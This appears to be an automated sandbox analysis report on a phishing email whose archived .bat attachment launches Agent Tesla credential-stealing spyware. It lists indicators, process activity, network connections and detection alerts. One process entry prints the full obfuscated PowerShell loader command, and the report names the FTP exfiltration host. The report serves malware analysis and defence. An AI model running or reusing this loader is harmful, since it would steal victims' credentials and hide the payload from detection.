File name:

AW_ Order n°96868421.eml

Full analysis: https://app.any.run/tasks/33314560-7383-445c-b9a9-f3f3b9be057c
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: October 03, 2025, 16:39:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
attachments
attc-arch
arch-exec
stealer
evasion
ultravnc
rmm-tool
agenttesla
exfiltration
ftp
susp-powershell
Indicators:
MIME: message/rfc822
File info: RFC 822 mail, ASCII text, with CRLF line terminators
MD5:

FEF58D78E1B626D3116D7099D5A78584

SHA1:

7FB63F76A399F69DF23276C43A064C0205300318

SHA256:

8E69BF0C0CC6FAAFB637A2C3BA9F8BB62A262728A44B7DDF1339AC50F886E103

SSDEEP:

12288:HMPf40is5/PAl3HRlRqsyTYVhL50bjP2ZPw+Y+KZ:HWf40is5/PAl3HResmYVhiHPGwg0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • OUTLOOK.EXE (PID: 2708)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Create files in the Startup directory

      • powershell.exe (PID: 2792)
    • Connects to the CnC server

      • powershell.exe (PID: 2792)
    • AGENTTESLA has been detected (SURICATA)

      • powershell.exe (PID: 2792)
    • AGENTTESLA has been detected (YARA)

      • powershell.exe (PID: 2792)
    • Steals credentials from Web Browsers

      • powershell.exe (PID: 2792)
    • Actions looks like stealing of personal data

      • powershell.exe (PID: 2792)
    • Stealers network behavior

      • powershell.exe (PID: 2792)
  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • WinRAR.exe (PID: 3136)
      • cmd.exe (PID: 1348)
      • cmd.exe (PID: 3236)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3136)
    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 3136)
      • cmd.exe (PID: 1348)
      • cmd.exe (PID: 3236)
    • Application launched itself

      • cmd.exe (PID: 1348)
      • cmd.exe (PID: 3236)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3060)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3060)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3060)
    • Executes script without checking the security policy

      • powershell.exe (PID: 2792)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3060)
    • Сharacter substitution obfuscation via .replace()

      • powershell.exe (PID: 2792)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 3060)
    • Reads the Internet Settings

      • powershell.exe (PID: 2792)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 2792)
    • Accesses Microsoft Outlook profiles

      • powershell.exe (PID: 2792)
    • Checks for external IP

      • powershell.exe (PID: 2792)
    • Connects to FTP

      • powershell.exe (PID: 2792)
    • Connects to unusual port

      • powershell.exe (PID: 2792)
    • The process connected to a server suspected of theft

      • powershell.exe (PID: 2792)
  • INFO

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2792)
    • Create files in a temporary directory

      • powershell.exe (PID: 2792)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Launching a file from the Startup directory

      • powershell.exe (PID: 2792)
    • Disables trace logs

      • powershell.exe (PID: 2792)
    • Creates files or folders in the user directory

      • powershell.exe (PID: 2792)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2792)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 2792)
    • ULTRAVNC has been detected

      • powershell.exe (PID: 2792)
    • Found Base64 encoded access to environment variables via PowerShell (YARA)

      • powershell.exe (PID: 2792)
    • Found Base64 encoded access to Marshal class via PowerShell (YARA)

      • powershell.exe (PID: 2792)
    • Reads the software policy settings

      • powershell.exe (PID: 2792)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 2792)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2792)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.eml | E-Mail message (Var. 5) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
6
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe winrar.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs #AGENTTESLA powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1348C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" "C:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2708"C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\AW_ Order n°96868421.eml"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
Modules
Images
c:\program files\microsoft office\office14\outlook.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2792""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" -nop -w h -c ""iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(('CgAkAGIAYQBuAGEAbgBhAD0AIgAkAGUAbgBrbgdxynufc2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFrbgdxynufcwAYQBvAGMALgBiAGEAdAAiADsAaQBmACgAVrbgdxynufcABlAHMAdAAtAFAAYQB0AGgAIAAkAGIAYQBurbgdxynufcAGEAbgBhACkAewAkAHIAYQB3AEwAaQBuAGUrbgdxynufcAcwA9AGcAYwAgACQAYgBhAG4AYQBuAGEAfArbgdxynufcA/AHsAJABfACAALQBsAGkAawBlACAAIgA6ArbgdxynufcDoAOgAqACIAfQA7ACQAcABhAHIAdAAxAD0ArbgdxynufcKAAkAHIAYQB3AEwAaQBuAGUAcwB8AD8AewArbgdxynufckAF8AIAAtAGwAaQBrAGUAIAAiADoAOgA6ADrbgdxynufcEAKgAiAH0AfAAlAHsAJABfAC4AUwB1AGIAcrbgdxynufcwB0AHIAaQBuAGcAKAA0ACkAfQApADsAJABwrbgdxynufcAGEAcgB0ADIAPQAoACQAcgBhAHcATABpAG4rbgdxynufcAZQBzAHwAPwB7ACQAXwAgAC0AbABpAGsAZQrbgdxynufcAgACIAOgA6ADoAMgAqACIAfQB8ACUAewAkArbgdxynufcF8ALgBTAHUAYgBzAHQAcgBpAG4AZwAoADQArbgdxynufcKQB9ACkAOwAkAHAAYQByAHQAMwA9ACgAJABrbgdxynufcyAGEAdwBMAGkAbgBlAHMAfAA/AHsAJABfACrbgdxynufcAALQBsAGkAawBlACAAIgA6ADoAOgAzACoAIrbgdxynufcgB9AHwAJQB7ACQAXwAuAFMAdQBiAHMAdAByrbgdxynufcAGkAbgBnACgANAApAH0AKQA7ACQAawBpAHcrbgdxynufcAaQA9ACQAcABhAHIAdAAxACsAJABwAGEAcgrbgdxynufcB0ADIAKwAkAHAAYQByAHQAMwA7ACQAYQBwArbgdxynufcHAAbABlAD0AKAAkAGsAaQB3AGkALQByAGUArbgdxynufccABsAGEAYwBlACIAWwB+ACMAQABdACIALAArbgdxynufciACIALQByAGUAcABsAGEAYwBlACIAbABqAHrbgdxynufcAAaQB5AHAAegBsAGYAYwBtAG0AagB0AHAAIrbgdxynufcgAsACIAIgApADsAaQBmACgAJABhAHAAcABsrbgdxynufcAGUAKQB7AHQAcgB5AHsAaQBlAHgAKABbAFQrbgdxynufcAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQrbgdxynufcA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0ArbgdxynufcFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUArbgdxynufccgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQArbgdxynufc2ADQAUwB0AHIAaQBuAGcAKAAkAGEAcABwAGrbgdxynufcwAZQApACkAKQB9AGMAYQB0AGMAaAB7AH0AfrbgdxynufcQB9AAoAJABvAHIAYQBuAGcAZQA9ACcASAA0rbgdxynufcAHMASQBBAEEAQQBBAEEAQQBBAEUAQQBKAFYrbgdxynufcAVQBhADAALwBiAE0AQgBUADkASwB4AGIASwrbgdxynufcAxAEcAUgAwAEgAZwBQAEUAcABsAGIANQAwArbgdxynufcEkAWQBDAEgAYQAvAFMAbABDAEcAdABvAE0ArbgdxynufcbABKAGIAaAB0AFQAeAB3ADYAMgArADAAZwBrbgdxynufcuAC8AdgB1AGMAcABDADgASwBHAGwAcwArAFrbgdxynufcIATQBuADEATwBlAGQAZQBuADMAdAB0AEsAerbgdxynufcABzAE0AQQBvADUAYwBaAEEARwBmADEARwA3rbgdxynufcADkAVgB2AGUAcQBjAGQAbQBxAFcAKwBQAHcrbgdxynufcATQBSAHEAWgA4AEkANQBYAHUANwA5AFYASQrbgdxynufcBOAFcAOQBWAFMARAB2AGkAUQBoAHgAUQBQArbgdxynufcFIATwBmAFQARABtAG8AYQBhAEMASQB6ADcArbgdxynufcagBqADcAYQBWAEUAawBtAFMAWAB4AE0AaQBrbgdxynufcuAGQALwBJAFAAQgBZAEIAbABmACsANQBmAFrbgdxynufcQAOQBUAEcAaABMAHMAUQB6AGkAVwBWAEcAZrbgdxynufcgBZAGsAMQBtAHEAeABWAEMAUwBOAE0ANQB3rbgdxynufcAEEAOQBSAEQAcgBlAFoASgBJAEIAcABzAHArbgdxynufcANwA3AEoAeABKAGMAaQBnAG4AZgBvAEgAawrbgdxynufcAxAGoAawBEAGsAdwBWADIAbAA2AEwAdwBVArbgdxynufcDYASgBJAG8AbwBIADcANgBqAHMAVQBBAHQArbgdxynufcUgBEAHIAbgBuAHYALwAxAHAAYwB3ADUAWgBrbgdxynufcDAHMASgBUAC8AQQBKAFMARwAyAEEASgAxAErbgdxynufckAawBUAGEATABnADYATgBEAFgAMAB2AEQAdrbgdxynufcAB5AHUASABuADcANgAxAGQAZQBwAEIAMAB6rbgdxynufcAHUAWgBIAFgAdQBmAHMAKwBsAHkATwByAG0rbgdxynufcAKwBDADgAWAA0AEUAcwBEAHYAegBtADgAZgrbgdxynufcBOAGwATQBYADcARQBzADcAdgBtAHEARgBiArbgdxynufcDIAZABwAHIAKwA4AGMALwBwAFoAagA3AHgArbgdxynufcNwBmAEQANABDAGkASwBOAFcAKwBjAGYAcABrbgdxynufc2AEMASQBRAE8AZgAzAGIAZwByAHUAUQBqAErbgdxynufcMAWQBtAHUAeQBzAEgANgBsAFgAdgBwADcAdrbgdxynufcgBGAHgAYwBHAGkAMQBCAGoAeQBVAHYAbwBTrbgdxynufcACsAWQB1AEMAYwBKAFYAdwBNAGgAawB4AFArbgdxynufcASwBDAFcAcwB5AEUAWQA0ADIATwBsAHgARgrbgdxynufcBlADEAVwAwAC8AcwBVAFgAdwBJAGMANgBmArbgdxynufcHEAcwBFAGYARQB4AFYASwB0AFMAcgAxAG0ArbgdxynufcNgBGADEANABYAFUAbgAxAGQAagBSAFoALwBrbgdxynufcpAFcAZgBCADYAcgBzAEoAaABEAEQAUAAzAErbgdxynufcMAcQBhAGYAcgBvAE4ASABDAEQAVgBhADIATrbgdxynufcgBhACsAeABwAGUAUQBDAEoAawBaAHIANABBrbgdxynufcAGsAZABuAFcARABXAFcAWgBKAGsAbABEAHErbgdxynufcAOQA1AGsAbABPAEoAdABPAHEASABvAGIANwrbgdxynufcBJAGsAawBsAGEAQwBVAEsAUgBLAGYALwBxArbgdxynufcFQAcABJAG0ARgBaAFcAUgBYADEAdAB5AEEArbgdxynufcYgAzADQAcwBaAE0ANAAxAFkAeABKAHkATgBrbgdxynufcaAEEAYQBZAFoAagAxAGgAbAAzAFcAKwBXAErbgdxynufc4AbQB5AHEAMABpADAASABTAHgAWQBiAHcAZrbgdxynufcAA3AG8AaQBFAGwAeQBVAHgAdwA3AFcANAB5rbgdxynufcAEcARQA4ADMAVwAxAHAAKwA3AG0AOABZAEgrbgdxynufcAYwAzAFoAYgBMAHEAYQB5AGkANABNAEcAQgrbgdxynufcBSAFUAMwBGAEEASwBrAG8AQgBsAFoAaQBjArbgdxynufcFgAZwBrAFIAMgBQADgAZwAwADkAQgA4AGUArbgdxynufcWABoAG4ATwArAEMAeQBrAGIAaQBtAEUAVwArbgdxynufcxAHoATAByAEMATQBvADEAeAB1AEwAdQBNADrbgdxynufcAAbgBZAGcAUwAyAHgAYwBlAE0ATABXAGUAcrbgdxynufcQBMAEsATAArAGIATQBWAEMAYQBYAHoAYgB4rbgdxynufcAGwAMAB5AE4AZQA4ADcAeQBpAE0AeAA3AFYrbgdxynufcASABOAEkATAArAHUAaQBnAHUAcQBiAGsAMwrbgdxynufcBVADAAMgBTACsAcQB0AEoAWQBmADAASgBaArbgdxynufcDcAbgBFAFgAUwBOAFIAZwByAEEAYwB6AGIArbgdxynufcWgBkAFkAQgAvAHMAcABvADkAcgB1AHQALwBrbgdxynufcpAEUAUwBzAEUAVAA0AFAAawBoAE0AeQAyACrbgdxynufcsAbwBCAHkAYwB1AGgAbAAzAEkARwBHAE0AYrbgdxynufcgBJAHQAcABFAGsANABSADUAYQBoAFUAZAAxrbgdxynufcAEIAaABDAEIAMABzAGwANwBDAHYAaQBkAFQrbgdxynufcAcQBqAHUAcgBZAHIAdABSAHEAcQBPAEkANArbgdxynufcBPAGEAQgBBAGwAYgBiAFAAZQBEAGgAMwBsArbgdxynufcCsAQgB4AG8ATQByAGoAZQAxAEQANgBrAGoArbgdxynufcKwBCAHkAVABVAHEALwBwADcATgBQAGcAYwBrbgdxynufc4AGQAZgBzAGwASwBQAGUAeABvAEMAKwBxAHrbgdxynufcIAZAB5AGIAcwAyADAATgBRAFcAdgBoAEYAarbgdxynufcQBjAEMAMgBmAGwAOQBpACsAegArAFgAKwA2rbgdxynufcAEoAUQByAEcALwA5ACsAQQA0AGgAaQB1AEQrbgdxynufcATgBQADUAZgA2AHAAZQBDAG0AcwA4AEkASwrbgdxynufcBuAE8AagBvAGsATwBMAFMASwA2AEkANwBPArbgdxynufcHEANgBZAG0AUgBYAFAAbgB3ADAATAB0AFQArbgdxynufcLwBBAEwARABJAG4AdgBGAE8AQgBnAEEAQQArbgdxynufcnADsAJABtAGEAbgBnAG8APQBbAEMAbwBuAHrbgdxynufcYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcrbgdxynufcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByrbgdxynufcAGEAbgBnAGUAKQA7ACQAcABpAG4AZQBhAHArbgdxynufcAcABsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwrbgdxynufcB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0ArbgdxynufcHIAZQBhAG0AKAAsACQAbQBhAG4AZwBvACkArbgdxynufcOwBpAGUAeAAoAE4AZQB3AC0ATwBiAGoAZQBrbgdxynufcjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGrbgdxynufcUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZrbgdxynufcQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzrbgdxynufcAHMAaQBvAG4ALgBHAFoAaQBwAFMAdAByAGUrbgdxynufcAYQBtACgAJABwAGkAbgBlAGEAcABwAGwAZQrbgdxynufcAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzArbgdxynufcGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkArbgdxynufcbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBrbgdxynufctAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGrbgdxynufcQAVABvAEUAbgBkACgAKQAKAA=='.Replace('rbgdxynufc','')))))""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3060C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3136"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls.tar"C:\Program Files\WinRAR\WinRAR.exeOUTLOOK.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3236cmd /c start "" /min "C:\Users\admin\AppData\Local\Temp\Rar$DIa3136.24627\Order nø96868421 xls.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
14 209
Read events
13 598
Write events
568
Delete events
43

Modification events

(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage
Operation:writeName:StemmerFiles_1042
Value:
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:delete valueName:*>*
Value:
㸪*ઔ
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:delete valueName:g;*
Value:
㭧*ઔ
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:delete keyName:(default)
Value:
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2708) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
6
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRA3D7.tmp.cvr
MD5:
SHA256:
2708OUTLOOK.EXEC:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
MD5:
SHA256:
2708OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmbinary
MD5:B648E676A8B33F1BDC736B161009ACEF
SHA256:CEFCC8B706C601FFE25C6C06B17A0FE295AF6EEE84454218DE30F0076A4ECE5F
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inftext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\tmpA4F1.tmptext
MD5:A03A1A57C95C1363DBA450776EBC6D46
SHA256:9A6AFCF6F47849C595752AC363BBDE10D2816D76791F75147BBB5148E9CEDBDE
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\StructuredQuery.logtext
MD5:717C04815E38C4A0955C21CC1F0AB3DD
SHA256:7E1CD4B6015D98A0591A2F7BFD19BD4BF545F2E16828D9D6578BE8C4288F7830
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{4B715911-E7DE-4605-A98F-3A0BFC0FAAE3}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.pngimage
MD5:4C61C12EDBC453D7AE184976E95258E1
SHA256:296526F9A716C1AA91BA5D6F69F0EB92FDF79C2CB2CFCF0CEB22B7CCBC27035F
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls (2).tarcompressed
MD5:0D3191B8754510DEC48415736B08519A
SHA256:2F06F0387773CF2F858E5634AB3597C8AD5085C9CA4FA8976F84D259EAAEE7C0
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls.tarcompressed
MD5:F47E7E715AF7F9A3DD4280DD91570A9D
SHA256:440A0806F8E618D11BA338A73E3FBBBB7D5B7E473F37C2E0A075C3B792CDB0C3
2708OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\MJK9L0MD\Order n96868421 xls.tar:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
9
DNS requests
5
Threats
13

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
whitelisted
4
System
192.168.100.255:138
whitelisted
1076
svchost.exe
224.0.0.252:5355
whitelisted
2708
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2792
powershell.exe
104.26.12.205:443
api.ipify.org
CLOUDFLARENET
US
whitelisted
2792
powershell.exe
192.185.13.234:21
ftp.concaribe.com
UNIFIEDLAYER-AS-1
US
malicious
2792
powershell.exe
192.185.13.234:44601
ftp.concaribe.com
UNIFIEDLAYER-AS-1
US
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.16.142
whitelisted
config.messenger.msn.com
  • 64.4.26.155
whitelisted
dns.msftncsi.com
  • 131.107.255.255
whitelisted
api.ipify.org
  • 104.26.12.205
  • 172.67.74.152
  • 104.26.13.205
whitelisted
ftp.concaribe.com
  • 192.185.13.234
unknown

Threats

PID
Process
Class
Message
1076
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
2792
powershell.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
Device Retrieving External IP Address Detected
ET INFO External IP Lookup api.ipify.org
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External IP Lookup by HTTP (api .ipify .org)
2792
powershell.exe
A Network Trojan was detected
ET MALWARE Agent Tesla CnC Exfil via TCP
2792
powershell.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Clear Text Login Exfiltration Atempt
2792
powershell.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Clear Text Password Exfiltration Atempt
2792
powershell.exe
A Network Trojan was detected
STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
2792
powershell.exe
A Network Trojan was detected
STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
2792
powershell.exe
Misc activity
INFO [ANY.RUN] FTP protocol command for uploading a file
No debug info